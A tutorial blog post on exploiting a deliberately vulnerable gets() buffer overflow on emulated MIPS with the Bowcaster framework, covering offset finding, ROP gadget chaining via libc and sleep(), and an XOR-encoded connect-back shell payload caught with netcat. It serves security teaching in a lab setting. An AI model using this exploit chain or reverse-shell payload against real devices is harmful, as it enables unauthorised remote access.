MIPS Buffer Overflows with Bowcaster

On October 13, 2013, in Tutorial, by Matt Defenthaler

This post should be capable of walking a novice through the process of exploiting a buffer overflow vulnerability on a MIPS platform. However, I’m actually writing this for myself since I’ve found that forcing myself to teach others is a great way to make sure I completely understand the concepts. We will be using a wonderful utility framework developed by Zach Cutlip called Bowcaster. Zach also has a tutorial of his own that contributed to my understanding of both MIPS exploitation and the use of his framework.

A note about Bowcaster:
Bowcaster is a utility written in Python that provides a nice API for organizing, documenting, and crafting exploits for the MIPS architecture. It is open source and extremely well-documented. It includes utilities that range from creating an initial patterned string useful for identifying offsets at which to place parts of an exploit to an XOR encoder to some near universal shellcode payloads. It also works with both big and little endian MIPS.

The basic process will be as follows:

  1. Get our MIPS emulator (qemu) running
  2. Install some essential utilities (gcc, gdb)
  3. Write a vulnerable application in C and compile it
  4. Explore the process of crafting an exploit
  5. Get a remote shell!

Firstly, we can’t rely directly on the x86 processor running our PC, so we have to install an emulator that understands MIPS. Zach put together a pretty good tutorial on compiling and running Qemu in an Ubuntu VM. Follow that before moving forward. NOTE: I used Ubuntu 12.04 in my VirtualBox VM and didn’t run into any major differences. Also, I will be using the mipsel (LSB, little endian) kernel and filesystem image in this tutorial, but the principles are essentially the same with big endian MIPS.

Once you have Qemu running Linux, go ahead and run the following (at the time of this writing, apt-get pulls in gcc 4.4.5 and gdb 7.6; objdump is provided by the binutils package)

apt-get install gcc gdb binutils

Open a text editor (nano and vi are there. I apt-get installed ‘mg’ which is a small emacs clone)

nano Vuln.c

insert the following C code and then save and exit (Ctrl+x followed by y if you’re in nano)

#include <stdio.h>

void GetInput(void)
{
    char buffer[512]; // the buffer we'll overflow

    gets(buffer); // gets is a vulnerable function because it stores input 
                  // into a buffer even if the buffer is too small
}

int main(void)
{
    GetInput();

    return 0;
}

Next, we’ll compile the program:

gcc -ggdb -o Vuln Vuln.c

That should produce the Vuln file which is our vulnerable program. (-ggdb compiles with debug symbols which will make it easier to navigate our code)

Now that we have our vulnerable executable, we can focus on the exploit side of things and start getting into Bowcaster.

First, a note about what we’re doing:

Essentially, our vulnerable program sets aside a fixed amount of memory (512 bytes) for user input but puts no limit on how many characters the user can enter. If the user enters more than the buffer can hold, the extra input spills past the end of the buffer and overwrites whatever the program stored next to it on the stack. By choosing those extra bytes carefully, we can control what the program does.

The first part of memory we’re interested in controlling is the return address of the GetInput() function. In order to discover the location of the portion in our input string that will overwrite the return address, we use Bowcaster to create a large string of a unique pattern of characters. We can then run our program with gdb and check the value that gets copied into $ra (return address register) and then determine its location in our input string.
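To make the idea concrete, here is a minimal sketch of how a patterned string lets you recover an offset. It is not Bowcaster’s implementation: make_pattern and find_offset are hypothetical helpers written for illustration (Python 3, standard library only), and the register value is simulated rather than read from gdb. The offset 540 is an arbitrary stand-in, not the real offset for Vuln.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits


def make_pattern(length):
    """Build a non-repeating pattern such as 'Aa0Aa1Aa2...' (illustrative only)."""
    chunks = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length].encode("ascii")


def find_offset(pattern, register_value):
    """Locate a 32-bit register value inside the pattern.

    On little-endian MIPS the first byte in memory becomes the least
    significant byte of the register, so pack the value with '<I'.
    """
    needle = struct.pack("<I", register_value)
    return pattern.find(needle)  # -1 if the value is not in the pattern


pattern = make_pattern(2048)

# Simulate what the epilogue does: load 4 bytes from a stack slot into $ra.
# Offset 540 is a placeholder chosen for this example.
simulated_ra = struct.unpack("<I", pattern[540:544])[0]
print(hex(simulated_ra), find_offset(pattern, simulated_ra))
```

Because every 4-byte window of the pattern is unique, the value that lands in a register identifies exactly one position in the input.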

First, open up your editor

nano PatternMaker.py

Now code up the following script that will output our patterned string to a file

from bowcaster.development.overflowbuilder import OverflowBuffer
from bowcaster.common.support import LittleEndian

buf = OverflowBuffer(LittleEndian, 2048)

# create a file called 'bof' and write a 
# 2048 character patterned string to it
f = open('bof', 'w')
f.write(str(buf))
f.close()

Save the file and close the editor. Then, run the script

python PatternMaker.py

If you list the directory, you should see a new file called ‘bof’.

Next, open Vuln in gdb so we can debug it.

gdb Vuln

Before we run the program, we want to set a breakpoint at the call to gets(), so we can inspect the registers before the overflow happens. List the program’s code by typing list and find out which line contains gets() in the GetInput() function.

Put a breakpoint at that line by entering (replacing the caps stuff, obviously)

b PUT_THE_LINE_NUMBER_HERE

Next, we’ll run Vuln using the contents of ‘bof’ as input

run < bof

The program should now be stopped at the breakpoint. Just for reference take a peek at $ra by running

info registers

At this point, $ra has not yet been overwritten. However, the call to gets() will copy the contents of ‘bof’ onto the stack. When gets() returns and GetInput() resumes, it enters its epilogue, which relies on a value saved on the stack to know where to return to (in this program, main() called GetInput(), so the saved return address should point back into main(), just past the call to GetInput() and its branch delay slot).

If we run the following command, we can determine where to add another breakpoint in order to view the value that got loaded into $ra

disas GetInput

Find the line near the bottom that contains the instruction ‘jr ra’. Use the hex address of that instruction to set a breakpoint.

b *0xADDRESS

Resume execution by typing continue and hitting enter. The program should pause at the new breakpoint and we can run info registers to check the new value of $ra. Copy $ra’s value because we’ll need it in a second.

Type quit into the gdb prompt and allow it to exit. Then, create a new file called PatternFinder.py and add the following to it:

import sys
from bowcaster.development.overflowbuilder import OverflowBuffer
from bowcaster.common.support import LittleEndian

buf = OverflowBuffer(LittleEndian, 2048)

# open the 'bof' file created by PatternMaker.py
# and put its contents in buf.overflow_string
f = open('bof', 'r')
buf.overflow_string = f.read()
f.close()

search_value = sys.argv[1]
value = int(search_value, 16) # convert the hex string to an int
offset = buf.find_offset(value)
if offset < 0:
    print "Couldn't find value %s in the overflow buffer" % search_value
else:
    print "Found value %s at\noffset: %d" % (search_value, offset)

Save, exit, and run the following where the last argument is the value you copied from $ra

python PatternFinder.py VALUE_FROM_RA

The script should print out the location of the value from $ra in ‘bof’. Since our input string overflowed into memory beyond what was allocated for it, when the epilogue of GetInput() loads what it believes is the return address into main() that it stored in the prologue, it actually copies part of ‘bof’ into $ra. This means that we have control over where the program goes after GetInput()!

Now we’ll begin crafting our exploit, but first, a note:
This particular exploit will use a ‘return-oriented programming’ (ROP) attack. We’ll be searching for blocks of assembly code that end in a jump or branch instruction whose target we control, so that we can chain them together. These blocks, called ROP gadgets, can fill registers with values from the overflowed positions on the stack, call functions, pretty much whatever we want.

Since we’re relying on libc for gets(), we can take advantage of the fact that our program has access to all of libc. Using an external library like libc has a couple of advantages. One is that large libraries give us more potential ROP gadgets, which is especially useful when the vulnerable binary is very small (like the one in this tutorial). Another is that addresses in a library’s text segment are less likely to contain null bytes, because libraries are generally loaded at higher addresses than the vulnerable executable (for instance, the address of Vuln’s text segment starts with a null byte: 0x00400000).

It is important to account for null bytes and other ‘badchars’ because input is generally cut off at the first one, which means everything after that character is ignored. Because we’re using the included libc library for our exploit, this is technically a ‘return-to-libc’ technique.
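A quick way to see why the choice of address matters is to pack a candidate address the way it will appear in the overflow string and look for bad bytes. The sketch below is only an illustration (Python 3, standard library only): bad_bytes_in is a hypothetical helper, the libc base is the one shown later in this tutorial, and the gadget offset 0x2fb48 is made up.

```python
import struct

BADCHARS = b"\x00\n"  # the two bytes this tutorial treats as bad


def bad_bytes_in(address, badchars=BADCHARS):
    """Return the bad bytes found in a 32-bit little-endian address."""
    packed = struct.pack("<I", address)
    return [b for b in packed if b in badchars]


vuln_text = 0x00400000               # Vuln's text segment
libc_gadget = 0x2aadc000 + 0x2fb48   # libc base plus a made-up gadget offset

for name, addr in (("Vuln", vuln_text), ("libc", libc_gadget)):
    print(name, hex(addr), "bad bytes:", bad_bytes_in(addr))
```

Note that the libc base address itself ends in a null byte; what has to be clean is the full gadget address (base plus offset) that actually goes into the buffer.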

In order to use a library like libc, we need to find the address of its text segment in the memory for our program. First, start Vuln in the background, then use the process ID to look up the base address for libc’s text segment. Feel free to terminate Vuln once you’ve found the address.

root@debian-mipsel:~# ./Vuln &
[2] 3123
[2]+ Stopped ./Vuln
root@debian-mipsel:~# cat /proc/3123/maps
00400000-00401000 r-xp 00000000 08:01 578741 /root/Vuln
00410000-00411000 rw-p 00000000 08:01 578741 /root/Vuln
2aaa8000-2aacb000 r-xp 00000000 08:01 261992 /lib/ld-2.11.3.so
2aacb000-2aace000 rw-p 00000000 00:00 0 
2aada000-2aadb000 r--p 00022000 08:01 261992 /lib/ld-2.11.3.so
2aadb000-2aadc000 rw-p 00023000 08:01 261992 /lib/ld-2.11.3.so
2aadc000-2ac42000 r-xp 00000000 08:01 261990 /lib/libc-2.11.3.so
2ac42000-2ac51000 ---p 00166000 08:01 261990 /lib/libc-2.11.3.so
2ac51000-2ac5a000 r--p 00165000 08:01 261990 /lib/libc-2.11.3.so
2ac5a000-2ac5c000 rw-p 0016e000 08:01 261990 /lib/libc-2.11.3.so
2ac5c000-2ac6f000 rw-p 00000000 00:00 0 
7f94f000-7f964000 rwxp 00000000 00:00 0 [stack]

The libc text segment’s base address is 0x2aadc000 (notice the ‘x’ in the privileges). Note that yours may be different.
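If you would rather not read the maps output by eye, the lookup can be scripted. This is a rough sketch under stated assumptions (Python 3, standard library only): find_text_base is a hypothetical helper, and MAPS_SAMPLE is an abbreviated copy of the listing above standing in for the contents of /proc/PID/maps.

```python
# Abbreviated copy of the /proc/3123/maps listing from this tutorial.
MAPS_SAMPLE = """\
00400000-00401000 r-xp 00000000 08:01 578741 /root/Vuln
2aaa8000-2aacb000 r-xp 00000000 08:01 261992 /lib/ld-2.11.3.so
2aacb000-2aace000 rw-p 00000000 00:00 0
2aadc000-2ac42000 r-xp 00000000 08:01 261990 /lib/libc-2.11.3.so
2ac51000-2ac5a000 r--p 00165000 08:01 261990 /lib/libc-2.11.3.so
7f94f000-7f964000 rwxp 00000000 00:00 0 [stack]
"""


def find_text_base(maps_text, library_name):
    """Return the start address of the first executable mapping of a library."""
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # anonymous mapping with no path
        addr_range, perms, path = fields[0], fields[1], fields[5]
        if "x" in perms and library_name in path:
            return int(addr_range.split("-")[0], 16)
    return None


print(hex(find_text_base(MAPS_SAMPLE, "libc-")))
```

On the target you would pass in the text read from the real maps file of the running Vuln process instead of the sample string.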

Now we’re ready to begin writing our exploit generation script. Start by opening a new file called Exploit.py in your editor and add the following to it.

from bowcaster.development.overflowbuilder import SectionCreator, OverflowBuffer
from bowcaster.common.support import LittleEndian

qemu_libc_base = 0x2aadc000
badchars = ['\0','\n']
SC=SectionCreator(LittleEndian, base_address=qemu_libc_base, badchars=badchars)
sections=[]

Save and exit.

Next comes the cumbersome, but kinda fun part. We have to look through the disassembly of libc to find ROP gadgets we can tie together to execute some shellcode. To save time, I like to save the output of objdump -d /lib/libc-2.11.3.so to a file and then open it with less to search for ROP gadgets. It’s really easy to search using regular expressions in less, too.
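The same search can be roughed out in a script. The sketch below is an illustration, not a real gadget finder (Python 3, standard library only): find_gadgets is a hypothetical helper, and DISASSEMBLY is a hand-written sample in the style of objdump -d output whose addresses do not correspond to real offsets in libc-2.11.3.so. It lists each jr/jalr along with the instructions before it and the branch delay slot after it, since on MIPS the instruction following a jump executes too.

```python
import re

# Hand-written sample in the style of `objdump -d` output; the addresses
# are made up and are not real libc offsets.
DISASSEMBLY = """\
0002fb10 <example_function>:
   2fb10:  8fbf0024  lw      ra,36(sp)
   2fb14:  8fb10020  lw      s1,32(sp)
   2fb18:  8fb0001c  lw      s0,28(sp)
   2fb1c:  03e00008  jr      ra
   2fb20:  27bd0028  addiu   sp,sp,40
"""

INSTRUCTION = re.compile(r"^\s*([0-9a-f]+):\s+[0-9a-f]{8}\s+(\S+)\s*(.*)$")


def find_gadgets(disassembly, jump_pattern=r"^(jr|jalr)$", context=3):
    """Yield (offset, instructions) for each jump, including the preceding
    instructions and the branch delay slot that runs with the jump."""
    parsed = []
    for line in disassembly.splitlines():
        match = INSTRUCTION.match(line)
        if match:
            offset, mnemonic, operands = match.groups()
            parsed.append((int(offset, 16), mnemonic, operands.strip()))
    for index, (offset, mnemonic, _) in enumerate(parsed):
        if re.match(jump_pattern, mnemonic):
            start = max(0, index - context)
            yield offset, parsed[start:index + 2]  # +2 keeps the delay slot


for offset, instructions in find_gadgets(DISASSEMBLY):
    print("jump at offset 0x%x" % offset)
    for addr, mnemonic, operands in instructions:
        print("  0x%x: %s %s" % (addr, mnemonic, operands))
```

A gadget like the sample one covers goal (1) below: it loads $ra and two s-registers from the stack and then jumps to whatever ended up in $ra.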

The goals of our ROP gadgets are as follows:

  1. Load values from the stack into as many of the s-registers (s0-s8) as we can and into $ra
  2. a) Set up $a0 with a low value, b) set a register to the address of sleep() in libc, c) jump to the address in that register
  3. Store a location relative to the stack pointer ($sp) into a register
  4. Use that register (or one that its value was copied into) in a jump instruction

(1) lets us put 4-byte segments of ‘bof’ into the s-registers. If we need an s-register to hold a certain value, we just pass the value of the register into PatternFinder.py and use the returned offset to tell our exploit script to load a different, more useful value in its place. The same goes for $ra, which we’ll replace with the address of the ROP gadget we’ll use for (2).

(2) The a-registers are used to store the arguments a function is called with. sleep() needs an argument in $a0 to know how many seconds to sleep. Why sleep()? Well, our buffer overflow contents were written as data, so they currently sit in the data cache (as opposed to the instruction cache) and can’t be executed from there. sleep() causes a context switch, which pushes the cache contents back into main memory. Once the overflow’s contents are in main memory, the processor can fetch them as instructions just as easily as data (exactly what we want).

(3,4) Because the stack is randomized (subsequent runs of the same program will cause the stack to be loaded at a different address), we have to ‘find’ the stack by storing a relative reference to it in a register and then use that register or one that receives its value in a jump instruction. Once a ROP gadget to locate the stack is found, we can use gdb to step through Vuln and determine what part of ‘bof’ exists at that location, feed it into PatternFinder.py and add our shellcode at that offset in ‘bof’. This is assuming that the relative stack position our ROP gadget uses actually contains data overflowed from ‘bof’. If it doesn’t, it’s back to searching through assembly to find a gadget that does.

NOTE: Sometimes shellcodes are long and the relative stack position might not give enough room to fit the shellcode before overwriting a different offset we were already using in ‘bof’. I will leave the solution to this as an exercise for the reader. Hint: once you can execute shellcode, you can tell the program what assembly to execute (you don’t have to rely on it already being there like with the ROP gadgets).
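The bookkeeping described above, placing values at known offsets and making sure nothing collides, can be sketched without Bowcaster. This is an illustration only (Python 3, standard library only): build_overflow and gadget are hypothetical helpers, and every offset and gadget address below is a placeholder for values you would get from PatternFinder.py and your own search through libc.

```python
import struct


def build_overflow(length, sections, filler=b"A"):
    """Place each (offset, data, description) section into a filler buffer,
    refusing to let two sections overlap."""
    buf = bytearray(filler * length)
    used = []  # (start, end, description) of sections already placed
    for offset, data, description in sorted(sections):
        end = offset + len(data)
        if end > length:
            raise ValueError("%s runs past the end of the buffer" % description)
        for start, stop, other in used:
            if offset < stop and start < end:
                raise ValueError("%s overlaps %s" % (description, other))
        buf[offset:end] = data
        used.append((offset, end, description))
    return bytes(buf)


def gadget(libc_base, libc_offset):
    """Pack an absolute gadget address as a little-endian 32-bit word."""
    return struct.pack("<I", libc_base + libc_offset)


LIBC_BASE = 0x2aadc000
# Placeholder offsets and gadget addresses, for illustration only.
sections = [
    (516, gadget(LIBC_BASE, 0x56bd0), "$s0: stand-in for the address of sleep()"),
    (540, gadget(LIBC_BASE, 0x2fb48), "$ra: stand-in for the first ROP gadget"),
    (600, b"\xcc" * 64, "stand-in for shellcode"),
]
overflow = build_overflow(2048, sections)
print(len(overflow), overflow[540:544])
```

The overlap check is the useful part: it fails loudly in exactly the situation the note above warns about, where shellcode grows into an offset that is already holding a register value.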

The remainder of the process will require stepping through arbitrary locations of libc. Since gdb isn’t expecting a user to jump into the middle of a function, I’ve found it helpful to run the following before returning into the first ROP gadget.

display/i $pc
stepi

This will show the next assembly instruction to be executed and will repeat with each consecutive step.

It’s also useful to display what is in a register or at a memory address. There are a ton of formats for displaying values in gdb, but the two most useful are below and are for instructions and 4-byte words as hex, respectively.

x/i $pc+4
x/wx $s0

Once we can jump to a relative stack location, it’s time to use some shellcode. Fortunately, Bowcaster comes with some useful shellcode utilities. The one we’ll use here is a connect-back shell. We just give it an IP to connect back to and the endianness. For simplicity’s sake, the connect-back IP can be that of the host (as opposed to the target which is running in qemu). Since our host’s IP contains a 0, we need to use the provided XOR encoder. The encoder performs an XOR operation on the connect-back shellcode with a randomly generated key and then includes a decoder in the shellcode to reverse the operation upon execution on the target. This is all necessary to prevent our overflow string from being terminated at the first bad character.
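To see why the encoder is needed and what XOR encoding buys us, here is a small sketch (Python 3, standard library only). It is not how Bowcaster’s MipsXorEncoder works internally: xor_bytes and find_key are hypothetical helpers, the key is a single byte found by brute force rather than a random one, and no MIPS decoder stub is generated. It only shows that the raw IP bytes contain bad characters and that an XOR pass can remove them reversibly.

```python
import socket

BADCHARS = b"\x00\n"


def xor_bytes(data, key):
    """XOR data with a repeating key; applying it twice restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def find_key(data, badchars=BADCHARS):
    """Search for a one-byte key that is clean itself and leaves no bad
    bytes in the encoded output."""
    for candidate in range(1, 256):
        if candidate in badchars:
            continue
        key = bytes([candidate])
        if not any(b in badchars for b in xor_bytes(data, key)):
            return key
    raise ValueError("no single-byte key avoids every bad character")


# The connect-back address ends up in the payload as four raw bytes.
ip_bytes = socket.inet_aton("10.0.2.15")
print("raw:", ip_bytes.hex(), "has bad byte:", any(b in BADCHARS for b in ip_bytes))

key = find_key(ip_bytes)
encoded = xor_bytes(ip_bytes, key)
decoded = xor_bytes(encoded, key)  # the job a decoder stub does on the target
print("key:", key.hex(), "encoded:", encoded.hex(), "round trip ok:", decoded == ip_bytes)
```

For this particular address both bad characters show up: the 0 octet is a null byte, and the leading 10 is 0x0a, the same byte as a newline.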

Append the following to the bottom of Exploit.py (the imports can be placed at the top of the file if desired and make sure to replace YOUR_OFFSET_HERE with the offset in ‘bof’ to insert the shellcode):

from bowcaster.payloads.mips.connectback_payload import ConnectbackPayload
from bowcaster.encoders.mips import MipsXorEncoder

payload=ConnectbackPayload("10.0.2.15",LittleEndian)

#XOR encode the payload
encoded_payload=MipsXorEncoder(payload,badchars=badchars)

section=SC.string_section(YOUR_OFFSET_HERE, encoded_payload.shellcode, "encoded connect-back payload")
sections.append(section)

# create the OverflowBuffer and fill it with our ROP gadgets and shellcode
buf = OverflowBuffer(LittleEndian, 2048, sections)
f = open('bof', 'w')
f.write(str(buf))
f.close()

Assuming ‘bof’ contains all the necessary ROP gadgets and the connect-back shellcode at the appropriate locations, open a terminal on your host machine and run:

nc -l 8080

This listens for an incoming connection on port 8080 (the default port of the connect-back shell). Next, on the qemu mipsel target, run:

python Exploit.py
cat bof | ./Vuln

The program should appear to be hanging. Once you’ve achieved that, go back to the host terminal where nc -l 8080 is running. It, too, should appear to be hanging. However, neither of the processes is hanging, and if you type ls or date or another command into the host terminal, you’ll notice you’re actually in a shell on the target! Hitting Ctrl+c in either terminal will end the session. It should be noted that Bowcaster also includes a connect-back server class that provides a lot more flexibility than just using netcat.

References:
A great overview of MIPS and exploiting MIPS devices
Walk-through of a real-world MIPS exploit by Craig Heffner (one of many posts)
Walk-through with Bowcaster by its author Zach Cutlip (one of many posts)

Attachments:
Exploity.py –  contains spoilers and I highly recommend you only view this as needed in order to truly learn and understand the process detailed above

Special thanks to Zach for reviewing this tutorial and providing me with more accurate info about a couple of things I goofed up or could have been more clear about in the original post.
